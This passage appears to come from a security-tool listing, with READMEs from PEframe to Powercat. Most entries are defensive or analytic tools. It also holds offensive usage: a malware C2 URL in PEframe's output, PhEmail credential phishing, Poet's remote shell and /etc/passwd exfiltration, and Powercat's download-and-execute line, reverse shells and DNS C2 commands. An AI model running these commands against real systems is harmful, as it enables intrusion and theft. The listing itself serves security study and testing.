However if you don't want it, you can uncheck it during installation and later install the latest version manually.


Download Password Sniffer Console

PEframe - Tool to perform static analysis on Portable Executable malware

PEframe is a open source tool to perform static analysis on Portable Executable malware.

Usage
$ peframe malware.exe
$ peframe [--option] malware.exe

Options
--json         Output in json

--import       Imported function and dll
--export       Exported function and dll

--dir-import   Import directory
--dir-export   Export directory
--dir-resource Resource directory
--dir-debug    Debug directory
--dir-tls      TLS directory

--strings      Get all strings
--sections     Sections information
--dump         Dump all information

Install
Prerequisites
Python 2.6.5 -> 2.7.x
Install
from pypi
# pip install https://github.com/guelfoweb/peframe/archive/master.zip
from git
$ git clone https://github.com/guelfoweb/peframe.git

$ cd peframe

# python setup.py install

Example
$ peframe malware.exe

Short information
------------------------------------------------------------
File Name          malware.exe
File Size          935281 byte
Compile Time       2012-01-29 22:32:28
DLL                False
Sections           4
Hash MD5           cae18bdb8e9ef082816615e033d2d85b
Hash SAH1          546060ad10a766e0ecce1feb613766a340e875c0
Imphash            353cf96592db561b5ab4e408464ac6ae
Detected           Xor, Sign, Packer, Anti Debug, Anti VM
Directory          Import, Resource, Debug, Relocation, Security

XOR discovered
------------------------------------------------------------
Key length         Offset (hex)       Offset (dec)
1                  0x5df4e            384846
2                  0x5df4e            384846
4                  0x5df4e            384846
8                  0x5df4e            384846

Digital Signature
------------------------------------------------------------
Virtual Address    12A200
Block Size         4813 byte
Hash MD5           63b8c4daec26c6c074ca5977f067c21e
Hash SHA-1         53731a283d0c251f7c06f6d7d423124689873c62

Packer matched [4]
------------------------------------------------------------
Packer             Microsoft Visual C++ v6.0
Packer             Microsoft Visual C++ 5.0
Packer             Microsoft Visual C++
Packer             Installer VISE Custom

Anti Debug discovered [9]
------------------------------------------------------------
Anti Debug         FindWindowExW
Anti Debug         FindWindowW
Anti Debug         GetWindowThreadProcessId
Anti Debug         IsDebuggerPresent
Anti Debug         OutputDebugStringW
Anti Debug         Process32FirstW
Anti Debug         Process32NextW
Anti Debug         TerminateProcess
Anti Debug         UnhandledExceptionFilter

Anti VM Trick discovered [2]
------------------------------------------------------------
Trick              Virtual Box
Trick              VMware trick

Suspicious API discovered [35]
------------------------------------------------------------
Function           CreateDirectoryA
Function           CreateFileA
Function           CreateFileMappingA
Function           CreateToolhelp32Snapshot
Function           DeleteFileA
Function           FindFirstFileA
Function           FindNextFileA
Function           GetCurrentProcess
Function           GetFileAttributesA
Function           GetFileSize
Function           GetModuleHandleA
Function           GetProcAddress
Function           GetTempPathA
Function           GetTickCount
Function           GetUserNameA
Function           GetVersionExA
Function           InternetCrackUrlA
Function           LoadLibraryA
Function           MapViewOfFile
Function           OpenProcess
Function           Process32First
Function           Process32Next
Function           RegCloseKey
Function           RegCreateKeyA
Function           RegEnumKeyExA
Function           RegOpenKeyA
Function           RegOpenKeyExA
Function           Sleep
Function           WSAStartup
Function           WriteFile
Function           closesocket
Function           connect
Function           recv
Function           send
Function           socket

Suspicious Sections discovered [2]
------------------------------------------------------------
Section            .data
Hash MD5           b896a2c4b2be73b89e96823c1ed68f9c
Hash SHA-1         523d58892f0375c77e5e1b6f462005ae06cdd0d8
Section            .rdata
Hash MD5           41795b402636cb13e2dbbbec031dbb1a
Hash SHA-1         b674141b34f843d54865a399edfca44c3757df59

File name discovered [43]
------------------------------------------------------------
Binary             wiseftpsrvs.bin
Data               ESTdb2.dat
Data               Favorites.dat
Data               History.dat
Data               bookmark.dat
Data               fireFTPsites.dat
Data               quick.dat
Data               site.dat
Data               sites.dat
Database           FTPList.db
Database           sites.db
Database           NovaFTP.db
Executable         unleap.exe
Executable         explorer.exe
FTP Config         FTPVoyager.ftp
Library            crypt32.dll
Library            kernel32.dll
Library            mozsqlite3.dll
Library            userenv.dll
Library            wand.dat
Library            wininet.dll
Library            wsock32.dll
Text               Connections.txt
Text               ftplist.txt
Text               signons.txt
Text               signons2.txt
Text               signons3.txt

Url discovered [2]
------------------------------------------------------------
Url                RhinoSoft.com
Url                http://0uk.net/zaaqw/gate.php

Meta data found [4]
------------------------------------------------------------
CompiledScript      AutoIt v3 Script
FileVersion         3, 3, 8, 1
FileDescription
Translation         0x0809 0x04b0


Download PEframe

PEInjector - MITM PE file infector


The executable file format on the Windows platform is PE COFF. The peinjector provides different ways to infect these files with custom payloads without changing the original functionality. It creates patches, which are then applied seamlessly during file transfer. It is very performant, lightweight, modular and can be operated on embedded hardware.

Features
  • Full x86 and x64 PE file support.
  • Open Source
  • Fully working on Windows and Linux, including automated installation scripts.
  • Can be operated on embedded hardware, tested on a Rasperberry Pi 2.
  • On Linux, all servers will be automatically integrated as service, no manual configuration required.
  • Plain C, no external libraries required (peinjector).
  • MITM integration is available in C, Python and Java. A sample Python MITM implementation is included.
  • Foolproof, mobile-ready web interface. Anyone who can configure a home router can configure the injector server.
  • Easy to use integrated shellcode factory, including reverse shells, meterpreter, ... or own shellcode. Everything is available in 32 and 64 bit with optional automated encryption. Custom shellcode can be injected directly or as a new thread.
  • An awesome about page and much more, check it out.

Pemcracker - Tool To Crack Encrypted PEM Files

This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.

It still uses high level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker 
pemcracker 0.1.0
pemcracker <path to pem> <word file>

pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example
bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

Compiling
make
This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

Alternatives
If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try out John the Ripper. Its little known ssh2john allows for converting PEM files to a format that can be fed into ./john. Details


Download Pemcracker

PentestBox - Portable Penetration Testing Distribution for Windows Environments


PentestBox is not like other Penetration Testing Distributions which runs on virtual machines. It is created because more than 50% of penetration testing distributions users uses windows.

So it provides an efficient platform for Penetration Testing on windows platform.
Check out demo video:


Easy To Use

It is a commandline utility which is all what you want.

Awesome Design

It is the same green font on black terminal but in an modern way. I am pretty sure you will like it.

Best Performance

PentestBox directly runs on host machine instead of virtual machines, so performance is obvious.

No Dependencies Needed

All the dependencies required by tools are inside PentestBox, so you can even run PentestBox on freshly installed windows without any hassle.

Portable

PentestBox is entirely portbale, so now you can carry your own Penetration Testing Environment on a USB stick. It will take care of dependencies required to run tools which are inside it.

Linux Environment

PentestBox contains nearly all linux utilities like bash, cat, chmod, curl, git, gzip, ls, mv, ps, ssh, sh, uname and others. 

Tools category

How to include your own Tool

If you want to include a tool which is not currently present in PentestBox then below are the ways to include it.
  • If it is Python based program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Python is configured inside PentestBox, you can directly go to that directory and then run that program by prepending python to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • If it is Ruby Based Program
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • As Ruby is configured inside PentestBox, you can directly go to that directory and then run that program by prepending ruby to the filename.
    • But if you want to set an alias for that program then please follow How to add an alias
  • It it is Executable file
    • Place that folder in PentestBox_Directory/bin or in any folder inside bin.
    • You can directly access by moving to that folder and typing the filename.
    • But if you want to set an alias for that program then please follow How to add an alias

Download PentestBox

PentestPackage - A Package of Multiple Pentest Scripts


Contents:

  • Wordlists - Comprises of password lists, username lists and subdomains
  • Web Service finder - Finds web services of a list of IPs and also returns any URL rewrites
  • Gpprefdecrypt.* - Decrypt the password of local users added via Windows 2008 Group Policy Preferences.
  • rdns.sh - Runs through a file of line seperated IPs and prints if there is a reverse DNS set or not.
  • grouppolicypwn.sh - Enter domain user creds (doesnt need to be priv) and wil lcommunicated with the domain controllers and pull any stored CPASS from group policies and decode to plain text. Useful for instant Domain Admin!
  • privchecker.sh - Very young script that simply checks DCenum to a list of users to find their group access, indicated any privilaged users, this list can be edited.
  • NessusParserSummary.py - Parses Nessus results to give a summary breakdown of findings plus a host count next to each.
  • NessusParserBreakdown.py- Parses Nessus results to give a host based breakdown of findings plus the port(protocol) and CVSS rating.
  • NmapParser.py - Parses raw NMAP results (or .nmap) and will create individual .csv files for each host with a breakdown of ports, service version, protocol and port status.
  • NmapPortCount.py - Parses raw NMAP results (or .nmap) and will generate a single CSV with a list of Hosts, a count of how many open/closed/filtered ports it has, the OS detection and ICMP response.
  • Plesk-creds-gatherer.sh - Used on older versions of plesk (before the encription came in) that allows you to pull out all the credentials form the databases using a nice Bash menu
  • BashScriptTemplate.sh - Handy boiler plate template fro use in new scripts.
  • PythonScriptTemplate.py - Handy boiler plate template fro use in new scripts.
  • ipexplode.pl - Simply expands CIDRs and prints the ips in a list, handy for when you need a list of IPs and not a CIDR
  • LinEsc.sh - Linux escilation script. This will test common methods of gaining root access or show potential areas such as sticky perms that can allow manual testing for root escilation
  • gxfr.py - GXFR replicates dns zone transfers by enumerating subdomains using advanced search engine queries and conducting dns lookups.
  • knock.sh - Simple script used to test/perform port knocking.
  • sslscan-split-file.py - Used to split a large SSLScan results file into individual SSLScan results.
  • TestSSLServer.jar - Similar tool to SSLScan but with different output.
  • wiffy.sh - Wiffy hacking tool, encapsulated in a single Bash script.


Download PentestPackage

Pentoo 2015 - Security-Focused Livecd based on Gentoo


Pentoo is a Live CD and Live USB designed for penetration testing and security assessment. Based on Gentoo Linux, Pentoo is provided both as 32 and 64 bit installable livecd. Pentoo is also available as an overlay for an existing Gentoo installation. It features packet injection patched wifi drivers, GPGPU cracking software, and lots of tools for penetration testing and security assessment. The Pentoo kernel includes grsecurity and PAX hardening and extra patches - with binaries compiled from a hardened toolchain with the latest nightly versions of some tools available.

It's basically a gentoo install with lots of customized tools, customized kernel, and much more. Here is a non-exhaustive list of the features currently included :
  • Hardened Kernel with aufs patches
  • Backported Wifi stack from latest stable kernel release
  • Module loading support ala slax
  • Changes saving on usb stick
  • XFCE4 wm
  • Cuda/OPENCL cracking support with development tools
  • System updates if you got it finally installed

Put simply, Pentoo is Gentoo with the pentoo overlay. This overlay is available in layman so all you have to do is layman -L and layman -a pentoo.

We have a pentoo/pentoo meta ebuild and multiple pentoo profiles, which will install all the pentoo tools based on USE flags. 

Pentoo 2015.0 RC3.8
Current Features :
  • Changes saving (including unetbooting support)
  • CUDA/OpenCL Enhanced cracking software
  • Kernel 4.0.8 and all needed patches for injection
  • XFCE 4.12
  • Please see blog for full release notes including known bootloader issues with some versions of unetbootin
  • Full tools list.

Download Pentoo 2015

Phan - Static Analyzer For PHP


Phan is a static analyzer for PHP.

Getting it running
Phan requires PHP 7+ with the php-ast extension loaded. The code you analyze can be written for any version of PHP.

To get phan running;
  1. Clone the repo
  2. Run composer install to load dependencies
  3. Run ./test to run the test suite
  4. Test phan on itself by running the following
./phan `find src/ -type f -path '*.php'`
If you don't have a version of PHP 7 installed, you can grab a php7dev Vagrant image or one of the many Docker builds out there.
Then compile php-ast . Something along these lines should do it:
git clone https://github.com/nikic/php-ast.git
cd php-ast
phpize
./configure
make install
And add extension=ast.so to your php.ini file. Check that it is there with php -m . If it isn't you probably added it to the wrong php.ini file. Check php --ini to see where it is looking.

Features
  • Checks for calls and instantiations of undeclared functions, methods, closures and classes
  • Checks types of all arguments and return values to/from functions, closures and methods
  • Supports @param , @return , @var and @deprecated phpdoc comments including union and void/null types
  • Checks for Uniform Variable Syntax PHP 5 -> PHP 7 BC breaks
  • Undefined variable tracking
  • Supports namespaces, traits and variadics
  • Generics (from phpdoc hints - int[], string[], UserObject[], etc.)
See the tests directory for some examples of the various checks.

Usage
phan *.php
or give it a text file containing a list of files (but see the next section) to scan:
phan -f filelist.txt
and it might generate output that looks like this:
test1.php:191 UndefError call to undefined function get_real_size()
test1.php:232 UndefError static call to undeclared class core\session\manager
test1.php:386 UndefError Trying to instantiate undeclared class lang_installer
test2.php:4 TypeError arg#1(arg) is object but escapeshellarg() takes string
test2.php:4 TypeError arg#1(msg) is int but logmsg() takes string defined at sth.php:5
test2.php:4 TypeError arg#2(level) is string but logmsg() takes int defined at sth.php:5
test3.php:11 TypeError arg#1(number) is string but number_format() takes float
test3.php:12 TypeError arg#1(string) is int but htmlspecialchars() takes string
test3.php:13 TypeError arg#1(str) is int but md5() takes string
test3.php:14 TypeError arg#1(separator) is int but explode() takes string
test3.php:14 TypeError arg#2(str) is int but explode() takes string
You can see the full list of command line options by running phan -h .

Generating a file list
This static analyzer does not track includes or try to figure out autoloader magic. It treats all the files you throw at it as one big application. For code encapsulated in classes this works well. For code running in the global scope it gets a bit tricky because order matters. If you have an index.php including a file that sets a bunch of global variables and you then try to access those after the include in index.php the static analyzer won't know anything about these.
In practical terms this simply means that you should put your entry points and any files setting things in the global scope at the top of your file list. If you have a config.php that sets global variables that everything else needs put that first in the list followed by your various entry points, then all your library files containing your classes.

Bugs
When you find an issue, please take the time to create a tiny reproducing code snippet that illustrates the bug. And once you have done that, fix it. Then turn your code snippet into a test and add it to tests then ./test and send a PR with your fix and test. Alternatively, you can open an Issue with details.

More on phpdoc types
All the phpdoc types listed on that page should work with one exception. It says that (int|string)[] would indicate an array of ints or strings. phan doesn't support a mixed-type constraint like that. You can say int[]|string[] meaning that the array has to contain either all ints or all strings, but if you have mixed types, just use array .
That means you can do:
<?php
/**
 * MyFunc
 * @param int                 $arg1
 * @param int|string          $arg2
 * @param int[]|int           $arg3
 * @param Datetime|Datetime[] $arg4
 * @return array|null
 */
function MyFunc($arg1, $arg2, $arg3, $arg4=null) {
    return null;
}
Just like in PHP, any type can be nulled in the function declaration which also means a null is allowed to be passed in for that parameter.
By default, and completely arbitrarily, for things like int[] it checks the first 5 elements. If the first 5 are of the same type, it assumes the rest are as well. If it can't determine the array sub-type it just becomes array which will pass through most type checks. In practical terms, this means that [1,2,'a'] is seen as array but [1,2,3] is int[] and ['a','b','c'] as string[] .

Dealing with dynamic code that confuses the analyzer
There are times when there is just no way for the analyzer to get things right. For example:
<?php
function test() {
    $var = 0;
    $var = call_some_func_you_cant_hint();
    if(is_string($var)) {
        $pos = strpos($var, '|');
    }
}
Your best option is, of course, to go and add a /** @return string|array */ comment to the call_some_func_you_cant_hint() function, but there are times when that is not an option. As far as the analyzer is concerned, $var is an int because all it sees is the $var = 0; assignment. It will complain about you passing an int to strpos() . You can help it out by adding a @var doc-type comment before the function:
<?php
/**
 * @var string|array $var
 */
function test() {
    ...
This tells the analyzer that along with the int that it figures out on its own, $var can also be a string or an array inside that function. This is a departure from the normal use of the @var tag which is to give properties types, so I don't suggest making a habit of using this hack. But it can be handy to shut up the analyzer without having to refactor the code to not overload the same variable with many different types.

How it works
One of the big changes in PHP 7 is the fact that the parser now uses a real Abstract Syntax Tree ( AST ). This makes it much easier to write code analysis tools by pulling the tree and walking it looking for interesting things.
Phan has 2 passes. On the first pass it reads every file, gets the AST and recursively parses it looking only for functions, methods and classes in order to populate a bunch of global hashes which will hold all of them. It also loads up definitions for all internal functions and classes. The type info for these come from a big file called FunctionSignatureMap.
The real complexity hits you hard in the second pass. Here some things are done recursively depth-first and others not. For example, we catch something like foreach($arr as $k=>$v) because we need to tell the foreach code block that $k and $v exist. For other things we need to recurse as deeply as possible into the tree before unrolling our way back out. For example, for something like c(b(a(1))) we need to call a(1) and check that a() actually takes an int, then get the return type and pass it to b() and check that, before doing the same to c() .
There is a Scope object which keeps track of all variables. It mimics PHP's scope handling in that it has a globals along with entries for each function, method and closure. This is used to detect undefined variables and also type-checked on a return $var .

Quick Mode Explained
In Quick-mode the scanner doesn't rescan a function or a method's code block every time a call is seen. This means that the problem here won't be detected:
<?php
function test($arg):int {
    return $arg;
}
test("abc")
This would normally generate:
test.php:3 TypeError return string but `test()` is declared to return int
The initial scan of the function's code block has no type information for $arg . It isn't until we see the call and rescan test()'s code block that we can detect that it is actually returning the passed in string instead of an int as declared.

Running tests
vendor/bin/phpunit


Download Phan

PhEmail - Automate Sending Phishing Emails


PhEmail is a python open source phishing email tool that automates the process of sending phishing emails as part of a social engineering test. The main purpose of PhEmail is to send a bunch of phishing emails and prove who clicked on them without attempting to exploit the web browser or email client but collecting as much information as possible. PhEmail comes with an engine to garther email addresses through LinkedIN, useful during the information gathering phase. Also, this tool supports Gmail authentication which is a valid option in case the target domain has blacklisted the source email or IP address. Finally, this tool can be used to clone corporate login portals in order to steal login credentials.

Usage

PHishing EMAIL tool v0.13
Usage: phemail.py [-e <emails>] [-m <mail_server>] [-f <from_address>] [-r <replay_address>] [-s <subject>] [-b <body>]
          -e    emails: File containing list of emails (Default: emails.txt)
          -f    from_address: Source email address displayed in FROM field of the email (Default: Name Surname <name_surname@example.com>)
          -r    reply_address: Actual email address used to send the emails in case that people reply to the email (Default: Name Surname <name_surname@example.com>)
          -s    subject: Subject of the email (Default: Newsletter)
          -b    body: Body of the email (Default: body.txt)
          -p    pages: Specifies number of results pages searched (Default: 10 pages)
          -v    verbose: Verbose Mode (Default: false)
          -l    layout: Send email with no embedded pictures 
          -B    BeEF: Add the hook for BeEF
          -m    mail_server: SMTP mail server to connect to
          -g    Google: Use a google account username:password
          -t    Time delay: Add deleay between each email (Default: 3 sec)
          -R    Bunch of emails per time (Default: 10 emails)
          -L    webserverLog: Customise the name of the webserver log file (Default: Date time in format "%d_%m_%Y_%H_%M")
          -S    Search: query on Google
          -d    domain: of email addresses
          -n    number: of emails per connection (Default: 10 emails)
          -c    clone: Clone a web page
          -w    website: where the phishing email link points to
          -o    save output in a file
          -F    Format (Default: 0): 
                0- firstname surname
                1- firstname.surname@example.com
                2- firstnamesurname@example.com
                3- f.surname@example.com
                4- firstname.s@example.com
                5- surname.firstname@example.com
                6- s.firstname@example.com
                7- surname.f@example.com
                8- surnamefirstname@example.com
                9- firstname_surname@example.com 

Examples: phemail.py -e emails.txt -f "Name Surname <name_surname@example.com>" -r "Name Surname <name_surname@example.com>" -s "Subject" -b body.txt
          phemail.py -S example -d example.com -F 1 -p 12
          phemail.py -c https://example.com


Disclaimer

Usage of PhEmail for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program.


Download PhEmail

Pixiewps - Bruteforce Offline the WPS Pin (Pixie Dust Attack)


Pixiewps is a tool written in C used to bruteforce offline the WPS pin exploiting the low or non-existing entropy of some APs (pixie dust attack). It is meant for educational purposes only. All credits for the research go to Dominique Bongard.

DEPENDENCIES
Pixiewps requires libssl. To install it:
    sudo apt-get install libssl-dev

INSTALLATION
Pixiewps can be built and installed by running:
    ~/pixiewps$ cd src
    ~/pixiewps/src$ make
    ~/pixiewps/src$ sudo make install

USAGE
 Usage: pixiewps <arguments>

 Required Arguments:

    -e, --pke           : Enrollee public key
    -r, --pkr           : Registrar public key
    -s, --e-hash1       : Enrollee Hash1
    -z, --e-hash2       : Enrollee Hash2
    -a, --authkey       : Authentication session key

 Optional Arguments:

    -n, --e-nonce       : Enrollee nonce
    -m, --r-nonce       : Registrar nonce
    -b, --e-bssid       : Enrollee BSSID
    -S, --dh-small      : Small Diffie-Hellman keys (PKr not needed)   [No]
    -f, --force         : Bruteforce the whole keyspace                [No]
    -v, --verbosity     : Verbosity level 1-3, 1 is quietest            [3]

    -h, --help          : Display this usage screen


USAGE EXAMPLE
A common usage example is:
    pixiewps --pke <pke> --pkr <pkr> --e-hash1 <e-hash1> --e-hash2 <e-hash2> --authkey <authkey> --e-nonce <e-nonce>
which requires a modified version of Reaver or Bully which prints AuthKey. The recommended version is reaver-wps-fork-t6x.
If the following message is shown:
[!] The AP /might be/ vulnerable. Try again with --force or with another (newer) set of data.
then the AP might be vulnerable and Pixiewps should be run again with the same set of data along with the option --force or alternatively with a newer set of data.

DESCRIPTION OF ARGUMENTS
    -e, --pke

        Enrollee's DH public key, found in M1.

    -r, --pkr

        Registrar's DH public key, found in M2 or can be avoided by specifying
        --dh-small in both Reaver and Pixiewps.

    -s, --e-hash1

        Enrollee Hash-1, found in M3.

    -z, --e-hash2

        Enrollee Hash-2, found in M3.

    -a, --authkey

        Registration Protocol authentication session key. Although for this parameter a
        modified version of Reaver or Bully is needed, it can be avoided by specifying
        small Diffie-Hellman keys in both Reaver and Pixiewps and supplying --e-nonce,
        --r-nonce and --e-bssid.

    -n, --e-nonce

        Enrollee's nonce, found in M1.

    -m, --r-nonce

        Registrar's nonce, found in M2.

    -b, --e-bssid

        Enrollee's BSSID.

    -S, --dh-small

        Small Diffie-Hellman keys. The same option MUST be specified in Reaver
        (1.3 or later versions) too. This option should be avoided when possible.

    -f, --force

        Force Pixiewps to bruteforce the whole keyspace (only for one type of PRNG).
        It could take up to several minutes to complete.

    -v, --verbosity

        Verbosity level (1-3). Level 3 displays the most information.

    -h, --help

        Display usage screen.


Download Pixiewps

Plecost - Wordpress Vulnerabilities Finder


Plecost is a vulnerability fingerprinting and vulnerability finder for Wordpress blog engine.

Why?
There are a huge number of Wordpress around the world. Most of them are exposed to be attacked and be converted into a virus, malware or illegal porn provider, without the knowledge of the blog owner.
This project try to help sysadmins and blog's owners to make a bit secure their Wordpress.

What's new?
This Plecost 3 version, add a lot of new features and fixes, like:
  • Fixed a lot of bugs.
  • New engine: without threads or any dependencies, but run more faster. We'll used python 3 asyncio and non-blocking connections. Also consume less memory. Incredible, right? :)
  • Changed CVE update system and storage: Now Plecost get vulnerabilities directly from NIST and create a local SQLite data base with filtered information for Wordpress and theirs plugins.
  • Wordpress vulnerabilities: Now Plecost also manage Wordpress Vulnerabilities (not only for the Plugins).
  • Add local vulnerability database are queryable. You can consult the vulnerabilities for a concrete wordpress or plugins without, using the local database.
You can read entire list in CHANGELOG file.

Installation
Install Plecost is so easy:
$ python3 -m pip install plecost
Remember that Plecost3 only runs in Python 3.

Quick start
Scan a web site si so simple:
$ plecost http://SITE.com
A bit complex scan: increasing verbosity exporting results in JSON format and XML:
JSON
$ plecost -v http://SITE.com -o results.json
XML
$ plecost -v http://SITE.com -o results.xml

Advanced scan options
No check WordPress version, only for plugins:
$ plecost -nc http://SITE.com 
Force scan, even if not Wordpress was detected:
$ plecost -f http://SITE.com
Display only the short banner:
$ plecost -nb http://SITE.com
List available wordlists:
$ plecost -nb -l 

// Plecost - Wordpress finger printer Tool - v1.0.0

Available word lists:
   1 - plugin_list_10.txt
   2 - plugin_list_100.txt
   3 - plugin_list_1000.txt
   4 - plugin_list_250.txt
   5 - plugin_list_50.txt
   6 - plugin_list_huge.txt
Select a wordlist in the list:
$ plecost -nb -w plugin_list_10.txt http://SITE.com
Increasing concurrency (USE THIS OPTION WITH CAUTION. CAN SHUTDOWN TESTED SITE!)
$ plecost --concurrency 10 http://SITE.com
Or...
$ plecost -c 10 http://SITE.com
For more options, consult the --help command:
$ plecost -h

Updating
New versions and vulnerabilities are released diary, you can upload the local database writing:
Updating vulnerability database:
$ plecost --update-cve
Updating plugin list:

$ plecost --update-plugins

ScreenShots


Download Plecost

Poet - A simple Post-Exploitation Tool


The client program runs on the target machine and is configured with an IP address (the server) to connect to and a frequency to connect at. If the server isn't running when the client tries to connect, the client quietly sleeps and tries again at the next interval. If the server is running however, the attacker gets a control shell to control the client and perform various actions on the target including:
  • reconnaissance
  • remote shell
  • file exfiltration
  • download and execute
  • self destruct

Getting started

Go to the releases page and download the latest poet-client and poet-server files available.
Then skip to the Usage section below.
Alternatively, you can build Poet yourself (it's pretty easy). Make sure you have the python2.7 and zip executables available.
$ git clone https://github.com/mossberg/poet
$ cd poet
$ make
This will create a bin/ directory which contains poet-client and poet-server.

Usage

Poet is super easy to use, and requires nothing more than the Python (2.7) standard library. To easily try it out, a typical invocation would look like:

Terminal 1:
$ ./poet-client -v 127.0.0.1 1
Terminal 2:
$ sudo ./poet-server
Note: By default, the server needs to be run as root (using sudo) because the default port it binds to is 443. If that makes you uncomfortable, simply omit sudo and use the -p <PORT> flag on both the client and server. Pick a nice, high number for your port (> 1024).
Of course, using the -h flag gives you the full usage.
$ ./poet-client -h
usage: poet-client [-h] [-p PORT] [-v] [-d] IP [INTERVAL]

positional arguments:
  IP                    server
  INTERVAL              (s)

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT
  -v, --verbose
  -d, --delete          delete client upon execution

$ ./poet-server -h
usage: poet-server [-h] [-p PORT]

optional arguments:
  -h, --help            show this help message and exit
  -p PORT, --port PORT

Demo

This is just a small sample of what poet can do.
The scenario is, an attacker has gotten access to the victim's machine and downloaded and executed the client (in verbose mode ;). He/she does not have the server running at this point, but it's ok, the client waits patiently. Eventually the attacker is ready and starts the server, first starting a shell and executing uname -a, then exfiltrating /etc/passwd. Then he/she exits and detaches from the client, which continues running on the target waiting for the next opportunity to connect to the server.
Victim's Machine (5.4.3.2):
$ ./poet-client -v 1.2.3.4 10
[+] Poet started with interval of 10 seconds to port 443. Ctrl-c to exit.
[!] (2015-03-27 03:40:12.259676) Server is inactive
[!] (2015-03-27 03:40:22.263161) Server is inactive
[!] (2015-03-27 03:40:32.267308) Server is inactive
[+] (2015-03-27 03:40:42.273376) Server is active
[!] (2015-03-27 03:41:07.145979) Server is inactive
[!] (2015-03-27 03:41:17.150634) Server is inactive
[!] (2015-03-27 03:41:27.155614) Server is inactive
[!] (2015-03-27 03:41:37.160440) Server is inactive

Attacker's Machine (1.2.3.4):
# ./poet-server
                          _
        ____  ____  ___  / /_
       / __ \/ __ \/ _ \/ __/
      / /_/ / /_/ /  __/ /
     / .___/\____/\___/\__/
    /_/

[+] Poet server started on 443.
[+] (2015-03-27 03:40:42.272601) Connected By: ('5.4.3.2', 59309) -> VALID
[+] (2015-03-27 03:40:42.273087) Entering control shell
Welcome to psh, the Poet shell!
Running `help' will give you a list of supported commands.
psh > shell
psh > user@server $ uname -a
Linux lolServer 3.8.0-29-generic #42~precise1-Ubuntu SMP Wed May 07 16:19:23 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
psh > user@server $ ^D
psh > exfil /etc/passwd
psh : exfil written to archive/20150327/exfil/passwd-201503274054.txt
psh > help
Commands:
  chint
  dlexec
  exec
  exfil
  exit
  help
  recon
  selfdestruct
  shell
psh > exit
[+] (2015-03-27 03:40:57.144083) Exiting control shell.
[-] (2015-03-27 03:40:57.144149) Poet server terminated.


Download Poet

PortDog - Simple Python Script to Detect Port Scanning Techniques


PortDog is a network anomaly detector aimed to detect port scanning techniques. It is entirely written in python and has easy-to-use interface. It was tested on Ubuntu 15. Please note that, it is not working on Windows OS due to suffering from capturing RAW packets.I am working on to write this script to work both platforms. In future , I'am thinking about adding firewall options that could block malicious attempts. It is using Raw packets for analysis. For this reason, please ensure that you have run this script from privileged session.

Usage:
sudo python portdog.py -t time_for_sniff_in_minutes
For example, if you want to detect for 5 minutes use:
sudo python portdog.py -t 5
For infinite detection use:
sudo python portdog.py -t 0

If you want to get list of scanned ports , press CTRL+C to get port list at runtime (If scan was happened).


Download PortDog

PortExpert - Monitors all applications connected to the Internet


PortExpert gives you a detailed vision of your personnal computer cybersecurity. It automatically monitors all applications connected to the Internet and give you all the information you might need to identify potential threats to your system.

Features
  • Monitor of application using TCP/UDP communications
  • User-friendly interface
  • Identifies remote servers (WhoIs service)
  • Allows to open containing folder of any applications
  • Allow to easily search for more info online
  • Automatic identification of related service : FTP, HTTP, HTTPS,...
  • Capability to show/hide system level processes
  • Capability to show/hide loopbacks
  • Time freeze function

Powercat - Netcat: The Powershell Version


Installation
powercat is a powershell function. First you need to load the function before you can execute it. You can put one of the below commands into your powershell profile so powercat is automatically loaded when powershell starts.
Load The Function From Downloaded .ps1 File:
    . .\powercat.ps1
Load The Function From URL:
    IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1')

Parameters:
-l      Listen for a connection.                             [Switch]
-c      Connect to a listener.                               [String]
-p      The port to connect to, or listen on.                [String]
-e      Execute. (GAPING_SECURITY_HOLE)                      [String]
-ep     Execute Powershell.                                  [Switch]
-r      Relay. Format: "-r tcp:10.1.1.1:443"                 [String]
-u      Transfer data over UDP.                              [Switch]
-dns    Transfer data over dns (dnscat2).                    [String]
-dnsft  DNS Failure Threshold.                               [int32]
-t      Timeout option. Default: 60                          [int32]
-i      Input: Filepath (string), byte array, or string.     [object]
-o      Console Output Type: "Host", "Bytes", or "String"    [String]
-of     Output File Path.                                    [String]
-d      Disconnect after connecting.                         [Switch]
-rep    Repeater. Restart after disconnecting.               [Switch]
-g      Generate Payload.                                    [Switch]
-ge     Generate Encoded Payload.                            [Switch]
-h      Print the help message.                              [Switch]

Basic Connections
By default, powercat reads input from the console and writes input to the console using write-host. You can change the output type to 'Bytes', or 'String' with -o.
Basic Client:
    powercat -c 10.1.1.1 -p 443
Basic Listener:
    powercat -l -p 8000
Basic Client, Output as Bytes:
    powercat -c 10.1.1.1 -p 443 -o Bytes

File Transfer
powercat can be used to transfer files back and forth using -i (Input) and -of (Output File).
Send File:
    powercat -c 10.1.1.1 -p 443 -i C:\inputfile
Recieve File:
    powercat -l -p 8000 -of C:\inputfile

Shells
powercat can be used to send and serve shells. Specify an executable to -e, or use -ep to execute powershell.
Serve a cmd Shell:
    powercat -l -p 443 -e cmd
Send a cmd Shell:
    powercat -c 10.1.1.1 -p 443 -e cmd
Serve a shell which executes powershell commands:
    powercat -l -p 443 -ep

DNS and UDP
powercat supports more than sending data over TCP. Specify -u to enable UDP Mode. Data can also be sent to a dnscat2 server with -dns.
Send Data Over UDP:
    powercat -c 10.1.1.1 -p 8000 -u
    powercat -l -p 8000 -u
Connect to the c2.example.com dnscat2 server using the DNS server on 10.1.1.1:
    powercat -c 10.1.1.1 -p 53 -dns c2.example.com
Send a shell to the c2.example.com dnscat2 server using the default DNS server in Windows:
    powercat -dns c2.example.com -e cmd

Relays
